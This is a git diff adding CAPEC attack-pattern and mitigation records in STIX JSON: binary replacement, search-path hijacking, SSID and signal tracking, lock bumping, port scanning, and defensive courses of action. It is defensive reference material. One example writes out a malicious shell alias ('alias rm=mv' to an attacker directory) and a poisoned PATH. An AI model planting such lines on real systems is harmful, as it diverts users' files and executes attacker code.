a/capec/attack-pattern/attack-pattern--fca5be19-03c1-4d06-8cb8-30687732cc12.json b/capec/attack-pattern/attack-pattern--fca5be19-03c1-4d06-8cb8-30687732cc12.json new file mode 100644 index 0000000000..81b49fad6f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--fca5be19-03c1-4d06-8cb8-30687732cc12.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--f38712dc-97ae-4ad2-a120-8c2367728a50", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--fca5be19-03c1-4d06-8cb8-30687732cc12", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Replace Binaries", + "description": "Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/642.html", + "external_id": "CAPEC-642" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html", + "external_id": "CWE-732" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "The installer for a previous version of Firefox would use a DLL maliciously placed in the default download directory instead of the existing DLL located elsewhere, probably due to DLL hijacking. This DLL would be run with administrator privileges if the installer has those privileges.", + "By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\\Windows\\system32\\. This value is set in the registry at HKEY_CURRENT_USER\\Control Panel\\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently." + ], + "x_capec_prerequisites": [ + "The attacker must be able to place the malicious binary on the target machine." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--fcbaba82-a505-427a-89f0-0284785340fd.json b/capec/attack-pattern/attack-pattern--fcbaba82-a505-427a-89f0-0284785340fd.json new file mode 100644 index 0000000000..59af760513 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--fcbaba82-a505-427a-89f0-0284785340fd.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--3f725631-3953-429f-a559-1ddc6a2d1f53", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--fcbaba82-a505-427a-89f0-0284785340fd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "WiFi SSID Tracking", + "description": "In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/613.html", + "external_id": "CAPEC-613" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html", + "external_id": "CWE-201" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html", + "external_id": "CWE-300" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "Open source and commercial software tools are available and open databases of known WiFi SSID addresses are available online." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--fce1eeb4-1761-4fba-a388-f45b968adf5a.json b/capec/attack-pattern/attack-pattern--fce1eeb4-1761-4fba-a388-f45b968adf5a.json new file mode 100644 index 0000000000..49c38b7933 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--fce1eeb4-1761-4fba-a388-f45b968adf5a.json @@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--643ac48e-6de5-4fe2-b4db-cedc018952af", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--fce1eeb4-1761-4fba-a388-f45b968adf5a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Leveraging/Manipulating Configuration File Search Paths", + "description": "This pattern of attack sees an adversary load a malicious resource into a program's standard path so that when a known command is executed then the system instead executes the malicious component. The adversary can either modify the search path a program uses, like a PATH variable or classpath, or they can manipulate resources on the path to point to their malicious components. J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/38.html", + "external_id": "CAPEC-38" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/426.html", + "external_id": "CWE-426" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/427.html", + "external_id": "CWE-427" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n Another method is to redirect commands by aliasing one legitimate command to another to create unexpected results. the Unix command \"rm\" could be aliased to \"mv\" and move all files the victim thinks they are deleting to a directory the attacker controls. In a Unix shell .profile setting\n alias rm=mv /usr/home/attacker\n In this case the attacker retains a copy of all the files the victim attempts to remove.\n ", + "\n A standard UNIX path looks similar to this\n /bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin\n If the attacker modifies the path variable to point to a locale that includes malicious resources then the user unwittingly can execute commands on the attackers' behalf:\n /evildir/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin\n This is a form of usurping control of the program and the attack can be done on the classpath, database resources, or any other resources built from compound parts. At runtime detection and blocking of this attack is nearly impossible, because the configuration allows execution.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must be able to write to redirect search paths on the victim host." + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--fd5e62d0-873c-46f1-bc11-d883bccfa71a.json b/capec/attack-pattern/attack-pattern--fd5e62d0-873c-46f1-bc11-d883bccfa71a.json new file mode 100644 index 0000000000..22b2ae6ab7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--fd5e62d0-873c-46f1-bc11-d883bccfa71a.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--1ea88ac7-c01f-4ec8-b6ad-e30c3068286e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--fd5e62d0-873c-46f1-bc11-d883bccfa71a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Lock Bumping", + "description": "An attacker uses a bump key to force a lock on a building or facility and gain entry. Lock Bumping is the use of a special type of key that can be tapped or bumped to cause the pins within the lock to fall into temporary alignment, allowing the lock to be opened. Lock bumping allows an attacker to open a lock without having the correct key. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A bump key is a specially constructed key that exploits this design. When the bump key is struck or firmly tapped, its teeth transfer the force of the tap into the key pins, causing the lock to momentarily shift into proper alignment for the mechanism to be opened.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/392.html", + "external_id": "CAPEC-392" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--fe33600f-e2e6-48c2-8033-e571646d5c66.json b/capec/attack-pattern/attack-pattern--fe33600f-e2e6-48c2-8033-e571646d5c66.json new file mode 100644 index 0000000000..ac9df5e8d0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--fe33600f-e2e6-48c2-8033-e571646d5c66.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--1c1e8d62-6e3a-48e8-abdf-458007d13b94", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--fe33600f-e2e6-48c2-8033-e571646d5c66", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Connect Scan", + "description": "An adversary uses full TCP connection attempts to determine if a port is open on the target system. The scanning process involves completing a 'three-way handshake' with a remote port, and reports the port as closed if the full handshake cannot be established. An advantage of TCP connect scanning is that it works against any TCP/IP stack. RFC 793 defines how TCP connections are established and torn down. TCP connect scanning commonly involves establishing a full connection, and then subsequently tearing it down, and therefore involves sending a significant number of packets to each port that is scanned. Compared to other types of scans, a TCP Connect scan is slow and methodical. This type of scanning causes considerable noise in system logs and can be spotted by IDS/IPS systems. TCP Connect scanning can detect when a port is open by completing the three-way handshake, but it cannot distinguish a port that is unfiltered with no service running on it from a port that is filtered by a firewall but contains an active service. Due to the significant volume of packets exchanged per port, TCP connect scanning can become very time consuming (performing a full TCP connect scan against a host can take multiple days). Generally, it is not used as a method for performing a comprehensive port scan, but is reserved for checking a short list of common ports.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/301.html", + "external_id": "CAPEC-301" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_prerequisites": [ + "The adversary requires logical access to the target network. The TCP connect Scan requires the ability to connect to an available port and complete a 'three-way-handshake' This scanning technique does not require any special privileges in order to perform. This type of scan works against all TCP/IP stack implementations." + ], + "x_capec_resources_required": [ + "The adversary can leverage a network mapper or scanner, or perform this attack via routine socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--fe873b5f-c572-46d4-bf82-9521ad00a324.json b/capec/attack-pattern/attack-pattern--fe873b5f-c572-46d4-bf82-9521ad00a324.json new file mode 100644 index 0000000000..9b324a80d3 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--fe873b5f-c572-46d4-bf82-9521ad00a324.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--799ae815-cdf3-4047-9402-92872e2b87a6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--fe873b5f-c572-46d4-bf82-9521ad00a324", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Contaminate Resource", + "description": "An adversary contaminates organizational information systems (including devices and networks) by causing them to handle information of a classification/sensitivity for which they have not been authorized. The information is exposed to individuals who are not authorized access to such information, and the information system, device, or network is unavailable while the spill is investigated and mitigated.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/548.html", + "external_id": "CAPEC-548" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--fede6dfd-28fe-430b-8e83-3954bd33ad25.json b/capec/attack-pattern/attack-pattern--fede6dfd-28fe-430b-8e83-3954bd33ad25.json new file mode 100644 index 0000000000..aeca6d1fae --- /dev/null +++ b/capec/attack-pattern/attack-pattern--fede6dfd-28fe-430b-8e83-3954bd33ad25.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--21192f21-acc1-468a-b04f-5d62694c6457", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--fede6dfd-28fe-430b-8e83-3954bd33ad25", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Collect Data from Common Resource Locations", + "description": "An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/150.html", + "external_id": "CAPEC-150" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/552.html", + "external_id": "CWE-552" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The targeted applications must either expect files to be located at a specific location or, if the location of the files can be configured by the user, the user either failed to move the files from the default location or placed them in a conventional location for files of the given type." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. In some cases, the attacker need not even have direct access to the locations on the target computer where the targeted resources reside." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ffae340f-2fbb-4ac5-88df-6ac596575620.json b/capec/attack-pattern/attack-pattern--ffae340f-2fbb-4ac5-88df-6ac596575620.json new file mode 100644 index 0000000000..3a8987fab7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ffae340f-2fbb-4ac5-88df-6ac596575620.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--8c82df73-d873-4d3a-b51b-4fe20c621426", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ffae340f-2fbb-4ac5-88df-6ac596575620", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Leveraging web tools (e.g. Mozilla's GreaseMonkey, Firebug) to change application behavior", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/211.html", + "external_id": "CAPEC-211" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ffc91151-400c-4a94-a854-0c7c73d162de.json b/capec/attack-pattern/attack-pattern--ffc91151-400c-4a94-a854-0c7c73d162de.json new file mode 100644 index 0000000000..c9c2069510 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ffc91151-400c-4a94-a854-0c7c73d162de.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--29d233df-fdbb-4bf5-a767-d540bfb4260f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ffc91151-400c-4a94-a854-0c7c73d162de", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Signal Strength Tracking", + "description": "In this attack scenario, the attacker passively monitors the signal strength of the target\u2019s cellular RF signal or WiFi RF signal and uses the strength of the signal (with directional antennas and/or from multiple listening points at once) to identify the source location of the signal. Obtaining the signal of the target can be accomplished through multiple techniques such as through Cellular Broadcast Message Request or through the use of IMSI Tracking or WiFi MAC Address Tracking.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/619.html", + "external_id": "CAPEC-619" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html", + "external_id": "CWE-201" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_skills_required": { + "Low": "Commercial tools are available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--005f78f7-e74b-4c18-bbb9-4ef42d88c147.json b/capec/course-of-action/course-of-action--005f78f7-e74b-4c18-bbb9-4ef42d88c147.json new file mode 100644 index 0000000000..aa0cdf4550 --- /dev/null +++ b/capec/course-of-action/course-of-action--005f78f7-e74b-4c18-bbb9-4ef42d88c147.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--88b7ae5d-70fa-458f-a15f-8612b37f9621", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--005f78f7-e74b-4c18-bbb9-4ef42d88c147", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-19-9", + "description": "Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--016940da-d1ad-4819-b998-04f223a789c4.json b/capec/course-of-action/course-of-action--016940da-d1ad-4819-b998-04f223a789c4.json new file mode 100644 index 0000000000..b421c838dd --- /dev/null +++ b/capec/course-of-action/course-of-action--016940da-d1ad-4819-b998-04f223a789c4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8de14973-4568-4e64-b56f-c827ddfc3371", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--016940da-d1ad-4819-b998-04f223a789c4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-590-0", + "description": "Have a large pool of backup IPs built into the application and support proxy capability in the application.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0294f3dd-2a98-44e1-a229-b6928f573805.json b/capec/course-of-action/course-of-action--0294f3dd-2a98-44e1-a229-b6928f573805.json new file mode 100644 index 0000000000..ccaf9a14f7 --- /dev/null +++ b/capec/course-of-action/course-of-action--0294f3dd-2a98-44e1-a229-b6928f573805.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0d85080a-d962-47c4-bfe9-933709b747e4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0294f3dd-2a98-44e1-a229-b6928f573805", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-198-1", + "description": "Implementation: Normalize, filter and white list any input that will be used in error messages.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0337ce50-78c7-41df-bfe9-8a1054ed5e4f.json b/capec/course-of-action/course-of-action--0337ce50-78c7-41df-bfe9-8a1054ed5e4f.json new file mode 100644 index 0000000000..6b91e9cd81 --- /dev/null +++ b/capec/course-of-action/course-of-action--0337ce50-78c7-41df-bfe9-8a1054ed5e4f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f3ef2948-953d-4761-b750-90e1a40afa55", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0337ce50-78c7-41df-bfe9-8a1054ed5e4f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-25-0", + "description": "Use known algorithm to avoid deadlock condition (for instance non-blocking synchronization algorithms).", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--033ebb89-b975-4cc6-8853-269cb21cd704.json b/capec/course-of-action/course-of-action--033ebb89-b975-4cc6-8853-269cb21cd704.json new file mode 100644 index 0000000000..2bf89b9464 --- /dev/null +++ b/capec/course-of-action/course-of-action--033ebb89-b975-4cc6-8853-269cb21cd704.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9e3e4bb1-3aa7-4f8e-9aab-3a4b7fdd571b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--033ebb89-b975-4cc6-8853-269cb21cd704", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-139-0", + "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--043a9f6d-144b-439f-84bf-43973bf67ad0.json b/capec/course-of-action/course-of-action--043a9f6d-144b-439f-84bf-43973bf67ad0.json new file mode 100644 index 0000000000..caca83dd33 --- /dev/null +++ b/capec/course-of-action/course-of-action--043a9f6d-144b-439f-84bf-43973bf67ad0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f8bec66a-c60b-4ae0-824c-4f569e8b8843", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--043a9f6d-144b-439f-84bf-43973bf67ad0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-248-1", + "description": "Input should be encoded prior to use in commands to make sure command related characters are not treated as part of the command. For example, quotation characters may need to be encoded so that the application does not treat the quotation as a delimiter.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--04440c70-46f9-4007-9983-336aa6149e9f.json b/capec/course-of-action/course-of-action--04440c70-46f9-4007-9983-336aa6149e9f.json new file mode 100644 index 0000000000..b272db397f --- /dev/null +++ b/capec/course-of-action/course-of-action--04440c70-46f9-4007-9983-336aa6149e9f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--29337154-2022-47ee-b1aa-a42ddefeb980", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--04440c70-46f9-4007-9983-336aa6149e9f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "coa-21-5", + "description": "Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0487a38e-a332-463c-9f0e-9eeb1b42348a.json b/capec/course-of-action/course-of-action--0487a38e-a332-463c-9f0e-9eeb1b42348a.json new file mode 100644 index 0000000000..ad9d0ad6b1 --- /dev/null +++ b/capec/course-of-action/course-of-action--0487a38e-a332-463c-9f0e-9eeb1b42348a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6f826c5b-3a1a-491d-a5fa-28c273551011", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0487a38e-a332-463c-9f0e-9eeb1b42348a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-90-0", + "description": "The server must initiate the handshake by issuing the challenge. This ensures that the client has to respond before the exchange can move any further", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--04f7d772-c475-4fa9-b2b8-2b057368ea23.json b/capec/course-of-action/course-of-action--04f7d772-c475-4fa9-b2b8-2b057368ea23.json new file mode 100644 index 0000000000..1599e601e5 --- /dev/null +++ b/capec/course-of-action/course-of-action--04f7d772-c475-4fa9-b2b8-2b057368ea23.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8050e0e8-6ef7-47c8-b487-feea55b20c86", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--04f7d772-c475-4fa9-b2b8-2b057368ea23", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-648-0", + "description": "Identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using whitelisting tools.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--056c51b8-7dea-4fae-ba35-723377253083.json b/capec/course-of-action/course-of-action--056c51b8-7dea-4fae-ba35-723377253083.json new file mode 100644 index 0000000000..383081a729 --- /dev/null +++ b/capec/course-of-action/course-of-action--056c51b8-7dea-4fae-ba35-723377253083.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b1b36391-879f-42d8-8896-56c90547c900", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--056c51b8-7dea-4fae-ba35-723377253083", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-3-1", + "description": "Canonicalize all data prior to validation.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--05bdf3fe-3618-4cd4-be74-e241a23c1df8.json b/capec/course-of-action/course-of-action--05bdf3fe-3618-4cd4-be74-e241a23c1df8.json new file mode 100644 index 0000000000..d12aa78636 --- /dev/null +++ 